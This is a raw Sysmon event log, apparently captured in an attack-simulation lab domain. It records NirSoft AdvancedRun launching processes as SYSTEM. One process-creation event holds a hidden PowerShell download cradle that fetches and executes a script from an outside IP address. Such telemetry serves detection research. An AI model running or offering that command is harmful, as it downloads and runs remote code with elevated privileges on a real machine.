20:15:10.499{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075883Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.499{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004075882Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.496{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004075881Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.495{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004075880Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.490{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004075380Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.077{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004075373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.073{834264DD-1435-61EB-7C08-000000002702}4360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "/c "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://34.218.235.219:80/b'))"""C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004075372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.072{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004075371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.071{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004075370Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.071{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075369Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.071{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075368Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.070{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075367Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.070{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075366Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.070{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075365Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.070{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075364Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.070{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075363Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.070{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075362Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.069{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075361Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.069{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075360Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.069{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 